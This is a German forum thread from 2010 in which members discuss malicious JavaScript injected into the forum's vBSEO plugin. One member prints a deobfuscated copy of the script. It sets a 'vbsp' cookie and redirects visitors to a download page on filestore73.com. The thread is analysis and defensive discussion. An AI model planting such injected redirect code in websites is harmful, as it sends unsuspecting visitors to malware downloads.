Fehler in der DP? (FileStore73.com)

**Sherlock**

Nicht gut...gar nicht gut. Aber Doktor D. macht das schon.

Für diejenigen, die sich nicht vorstellen können, was so garstig daran ist, hier mal ein nicht ganz so trockener Artikel zum Thema:

http://www.heise.de/security/artikel...t-1017983.html

Sherlock

**Daniel**

Jein. Panik wäre zuviel des Guten.

Das Problem ist bekannt und vBSEO (der Hersteller der SEO-Erweiterung für vBulletin) und InternetBrands (Hersteller von vBulletin) schieben sich gegenseitig den schwarzen Peter hin und her.

Der Code "versteckt" sich in einem Plugin von vBSEO und wenn man dort einen bestimmten Cache neu aufbaut, ist der Code auch erst mal weg. Toll ist das keinesfalls, dennoch ich das Eindringen offenbar auf genau diese eine Stelle beschränkt: Es gab bis heute keine anderen Vorkommen dieses Codes. Ich werde schauen, dass ich eine Script-Lösung entwickle, die den Schadcode erkennt und dann bei Bedarf löscht.

Jetzt mal eine doofe Frage, weil ich mich mit dem Zeug nicht so auskenne:
Konnte das gefährlich für den eigenen Rechner gewesen sein, wenn man einmal auf diese ominöse Seite gelinkt wurde?

**mkinzler**

Vielleicht bevor der entsprechende Download gelöscht wurde.

**Valle**

Zitat von blackfin:

Jetzt mal eine doofe Frage, weil ich mich mit dem Zeug nicht so auskenne:
Konnte das gefährlich für den eigenen Rechner gewesen sein, wenn man einmal auf diese ominöse Seite gelinkt wurde?

So wie es ist seit ich es gesehen habe nicht. Wenn du natürlich den angegebenen Download wirklich runtergeladen und ausgeführt hast (falls es eine .exe war), dannn möglicherweise schon. Aber normalerweise reicht ein wenig Köpfchen aus, um sowas als ungefährlich zu begegnen.

Liebe Grüße,
Valle

Sowas mache ich generell nicht

Danke für die Antworten!

**littleDave**

Ich habe mir eben mal die Mühe gemacht und den JavaScript-Source "etwas" umgeschrieben. Weiß nicht, ob alles so stimmt:

markieren

Code:

			var consts = ["getTime", "setTime", "; expires=", "toGMTString", "cookie", "=", "; path=/", "vbsp", "1", "location", "http://filestore73.com/download.php?id="];

   function ipbcc(arg0, arg1)

   {

      // new Date

      var newDate = new Date;

      // newDate["setTime"](newDate["getTime"]() + 86400000);      

      newDate[consts[1]](newDate[consts[0]]() + 86400000);

      // newVar = "; expires=" + newDate["toGMTString"]();

      var newVar = consts[2] + newDate[consts[3]]();

      // arg0 = "vbsp"

      // arg1 = "1"

      // document["cookie"] = "vbsp" + "=" + "1" + newVar + "; path=/";  

      document[consts[4]] = arg0 + consts[5] + arg1 + newVar + consts[6];

   }

   // ipbcc("vbsp", "1");

   ipbcc(consts[7], consts[8]);

   // document["location"] = http://filestore73.com/download.php?id=" + vbsp 

   document[consts[9]] = consts[10] + vbsp;

Jedenfalls speichert das Script ein Cookie mit dem Namen "vbsp", der nach einem Tag abläuft. Vielleicht sollte man den lieber im Browser löschen.

Gruß

**Valle**

Zitat von littleDave:

[...] Vielleicht sollte man den lieber im Browser löschen.

Ich würde ihn eher auf 1 Jahr verlängern.

Nur wenn dieser Keks gesetzt ist, wird dir der JavaScript-Code untergeschoben. Anders bekommst du die Standard-DP zu sehen.

Edit://

Quelle zu Daniels Aussage.

Liebe Grüße,
Valle

**Sherlock**

Ich würde gerne Valle korrigieren und Blackfin verunsichern

In diesem konkreten Fall scheint nix schlimmes zu passieren. Aber wenn man sich doch mal den von mir geposteten

Link zu Gemüte führt, erkennt man, daß eben nicht eine EXE geladen werden muss, deren Start eine Bestätigung des Anwenders erfordert. Man geht heutzutage anders vor (schließlich will man ja die Nerven der Vista-User schonen).

Sherlock

Mhm, aber der Link gilt ja für den Internet Exploder, und wer surft schon damit (Hoëcker, sie sind raus!)

Fehler in der DP? (FileStore73.com)

AW: Fehler in der DP? (FileStore73.com)

AW: Fehler in der DP? (FileStore73.com)

AW: Fehler in der DP? (FileStore73.com)

AW: Fehler in der DP? (FileStore73.com)

AW: Fehler in der DP? (FileStore73.com)

AW: Fehler in der DP? (FileStore73.com)

AW: Fehler in der DP? (FileStore73.com)

AW: Fehler in der DP? (FileStore73.com)

AW: Fehler in der DP? (FileStore73.com)

AW: Fehler in der DP? (FileStore73.com)

Forumregeln

blackfin (Gast) n/a Beiträge	#13 AW: Fehler in der DP? (FileStore73.com) 4. Aug 2010, 15:51 Jetzt mal eine doofe Frage, weil ich mich mit dem Zeug nicht so auskenne: Konnte das gefährlich für den eigenen Rechner gewesen sein, wenn man einmal auf diese ominöse Seite gelinkt wurde?
	Zitat

mkinzler (Moderator) Registriert seit: 9. Dez 2005 Ort: Heilbronn 39.851 Beiträge Delphi 11 Alexandria	#14 AW: Fehler in der DP? (FileStore73.com) 4. Aug 2010, 15:53 Vielleicht bevor der entsprechende Download gelöscht wurde. Markus Kinzler
	Zitat

blackfin (Gast) n/a Beiträge	#16 AW: Fehler in der DP? (FileStore73.com) 4. Aug 2010, 15:56 Sowas mache ich generell nicht Danke für die Antworten!
	Zitat

blackfin (Gast) n/a Beiträge	#20 AW: Fehler in der DP? (FileStore73.com) 4. Aug 2010, 16:22 Mhm, aber der Link gilt ja für den Internet Exploder, und wer surft schon damit (Hoëcker, sie sind raus!)
	Zitat